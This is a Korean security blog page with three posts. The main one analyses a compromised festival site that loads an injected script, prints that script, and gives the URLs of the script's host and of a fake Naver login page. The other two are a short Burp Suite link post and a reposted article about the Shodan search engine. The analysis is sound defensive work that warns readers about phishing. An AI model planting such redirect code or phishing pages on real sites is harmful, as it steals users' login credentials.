'모의해킹'에 해당되는 글 157건

  1. 2015.08.20 네이버 로그인 정보 탈취 피싱사이트
  2. 2015.08.13 Intercept Mobile Traffic with Burp Suite
  3. 2015.02.26 사물인터넷의 구글인 쇼단(Shodan) 검색엔진 (1)
2015.08.20 18:43

네이버 로그인 정보 탈취 피싱사이트

여름 끝자락, 가족물총축제로 시원하게!

http://mediahub.seoul.go.kr/archives/903363


위 사이트에 게재된 뉴스 기사를 통해 아래 내용을 접하고


기사내용 일부:

참가 접수는 물총축제 홈페이지(water.ibabynews.com)에서 진행하며, 신청한 가족 중 추첨을 통해 500가족을 선발합니다.


해당 내용에 따라 참가 접수를 위해 홈페이지 방문을 했는데 아래와 같이 네이버 로그인 창이 떳다.



이는 그냥 봐도 의심 안할 수가 없는 상황이다. ㅋ

네이버 로그인을 붙일 수는 없을것 같은데 설마해서 아이디/비밀번호를 엉터리로 입력해서 로그인 해봤다.

결국 에러창이 떳고 세부내용 확인 결과 네이버 로그인 정보 탈취하는 피싱사이트 감염된 상태였다.



문제가 되는 naver.js 파일이 로딩되고 있었다.


http://www.kwanginsa.com/cd/naver.js

if(document.cookie.indexOf("do_naver=")==-1)

{


var expires=new Date();

expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie="do_naver=Yes;path=/;expires="+expires.toGMTString();

var ref = document.referrer;

location.href="http://www.koreaconst.co.kr/file_upload/login.php";


}


이는 네이버 로그인 정보 탈취 피싱사이트로 이동시키고 있었다.


http://www.koreaconst.co.kr/file_upload/login.php


네이버 아이디 비밀번호를 입력하면 해커에게 고스란히 전달될 것이다.



피싱사이트 URL로 네이버 툴바가 설치된 상태에서 접속을 해보면 차단을 해준다.

하지만, 위 사이트처럼 프레임 내부에서 이동될 경우에는 안타깝게도 차단되지 않는다.


http://www.koreaconst.co.kr/file_upload/login.php


해당 피싱사이트에 접속해보면 아래와 같이 네이버와 유사한 로그인 창이 나타나게 되고

일반적인 사용자는 의심없이 네이버 아이디와 비밀번호를 입력할 것이다.



본인이 직접 네이버 사이트로 접속을 한 경우가 아니라면

네이버 아이디와 비밀번호를 요구할 경우 반드시 의심을 해보고

의심스럽다 생각될 경우 아이디와 비밀번호를 엉터리로 입력해서

정상적으로 네이버 로그인 에러 화면이 나오는지 반드시 확인되어야 할 것이다.


그리고 사이트 비밀번호는 반드시 사이트 마다 서로다른 비밀번호를 사용해야 하며

비밀번호는 주기적으로 변경을 통해 꾸준한 관리가 반드시 필요하다.

비밀번호 변경시에는 이전 사용한 비밀번호 사용을 재사용 하지 않아야 한다.

저작자 표시 비영리 변경 금지
신고

Trackback 0 Comment 0
2015.08.13 15:57

Intercept Mobile Traffic with Burp Suite

Configuring a Linux VM to intercept mobile traffic with Burp Suite
Blog post on the subject: http://exploitedintelligence.com/blog...



저작자 표시 비영리 변경 금지
신고

Trackback 0 Comment 0
2015.02.26 09:58

사물인터넷의 구글인 쇼단(Shodan) 검색엔진

사물인터넷의 구글인 쇼단, 취약점 노출로 인해 해커와 테러리스트의 놀이터가 되다

http://www.itworld.co.kr/news/91437



쇼단(Shodan) 검색엔진을 이용하면 백도어가 노출된 라우터, 안전하지 못한 웹캠, 기본값 비밀번호를 사용하는 산업 제어 시스템 등을 찾을 수 있다.

쇼단은 사물인터넷을 위한 '구글'이자, 해커와 테러리스트의 놀이터이며, (어쩌면) 기업들이 자신의 환경을 잠글 때 유용하게 이용할 수 있는 툴이다.

쇼단의 창업자인 존 메테리는 5년 전, 기업들에게 제품이 사용되는 장소와 방법에 대한 정보를 제공하는 시장 정보 툴(Market intelligence tool)로 이 검색엔진을 발표했다.

메테리는 "물론 실증적 데이터를 이용, 경쟁 업체의 시장 포지셔닝을 더 잘 이해할 수 있는 정보를 질의해 얻을 수도 있다"고 설명했다.

그러나 발표 이후 이 검색엔진은 '스스로의 삶'을 살기 시작했다.

이에 대해 메테리는 "보안 전문가들이 인터넷을 더 잘 이해하는데 유용한 툴이 됐다"고 말했다.

공개 웹사이트는 쇼단이 검색할 수 있는 많은 것 가운데 일부에 불과하다. 기업 고객들은 수집하는 데이터 일체에 대한 실시간 액세스를 구입할 수 있다. 예를 들어, 쇼단을 이용해 기업 내부 네트워크를 검색할 수 있다.

메테리는 "대기업에는 도급업체나 협력업체가 제대로 설정하지 못한 상태에서 온라인에 연결된 자동화 시스템이나 텔넷이 실행되는 컴퓨터들이 있다. 게다가 클라우드 컴퓨팅이 증가하면서, 인증 체계가 없어 콘텐츠가 인터넷에 유출될 수 있는 클라우드 서버가 크게 증가하고 있다"고 말했다.

기업들은 또 쇼단을 이용해 함께 사업을 할 계획을 갖고 있거나, 인수를 하고자 하는 회사의 보안을 점검할 수도 있다.

그리고 범죄자들이 이용하는 악성코드 C&C 서버(Command and Control Server)를 발견할 수도 있다. 이 작업은 통상적으로 집중적인 시간 투자가 필요한 프로세스다. 메테리는 "그러나 쇼단을 이용하면 아주 쉽게 파악할 수 있다"고 설명했다.

미국 미네아폴리스에 본사를 둔 매니지드 보안 서비스 공급업체인 넷시큐리스(Netsecuris Inc.) 대표이자 CEO 레오나르드 제이콥스는 "쇼단이 위협이 된다고 생각하지는 않는다. 우리는 쇼단을 고객들에게 유용한 도구로 활용한다. 다른 기법을 통해 발견한 것을 확인하는데 쇼단을 이용하고 있다"고 말했다.

원칙적으로, 기업은 인터넷에 노출된 장치와 시스템을 전부 파악해야 한다. 그러나 편리함을 추구하느라 이런 원칙을 무시하는 경우가 있다. 제이콥스는 "실제 사례를 보면 놀랄 것이다"고 말했다.

쇼단, 악의 축?
공격자들 또한 쇼단을 통해 특정 장비나 특정 소프트웨어를 재빨리 발견할 수 있다.
캐나다의 보안 컨설팅 업체인 택티컬 인텔리전스(Tactical Intelligence Inc.)의 파트너 쉐인 맥두갈은 "예를 들어, 해커들은 전체 인터넷을 뒤지지 않아도, 쇼단에서 특정 시그내처를 찾아 웹에 연결된 모든 퍼비(Furby)를 재빨리 발견할 수 있다"고 말했다.

바르엘은 "쇼단은 단지 취약점을 알려줄 뿐이다. 물론 해킹 공격에서 취약한 노드를 감지하는 것이 중요하다는 점에는 이견이 있을 수 없다. 그러나 해커들은 쇼단이 개발되기 훨씬 이전부터 자동화된 크롤러(Crawlers)로 이를 수행할 수 있었다"고 말했다.

또한 대다수 보안 전문가들은 취약점을 발견하고 난 이후에는 이를 숨기기보다 공개하는 것이 낫다는 점에 동의했다.

바르엘은 "취약한 시스템을 이용하는 사람들은 이런 취약점을 알 권리를 갖고 있다"고 강조했다. 그래야만 취약한 시스템을 제공한 개발업체를 교체하는 등 조치를 취할 수 있기 때문이다.

바르엘은 "상용 제품에서 발견된 취약점을 공개하는 것은 개발업체들이 이를 고치도록 유도할 수 있는 효과적인 방법이 된다"고 덧붙였다. 또한 "개발업체들이 제품의 보안 문제를 몇 달 또는 몇 년 동안 무시했다가, 공개가 되고 난 이후에야 이를 바로잡았던 사례가 많았다. 사실 해결되지 않은 취약점은 시한폭탄이나 다름없다"고 덧붙였다.

쇼단의 메테리는 "범죄자들은 이미 가용한 툴들을 보유하고 있다"고 말했다. 쇼단 웹사이트는 사용자가 계정을 등록하도록 요구하고 있다. 또한 첫 검색만 무료다.




출처 : itworld.co.kr

저작자 표시 비영리 변경 금지
신고

Trackback 0 Comment 1
  1. Favicon of http://blogger.pe.kr Tae-Ho 2015.02.27 10:37 신고 address edit & del reply

    사물인터넷 기기의 보안도 이슈가 되니 공부할게 점점 많아지네요. 이젠 임베디드 OS까지 봐야하는건지.. ^^ 정보보안기사를 1회 때 붙으셨다니.. 대단하십니다~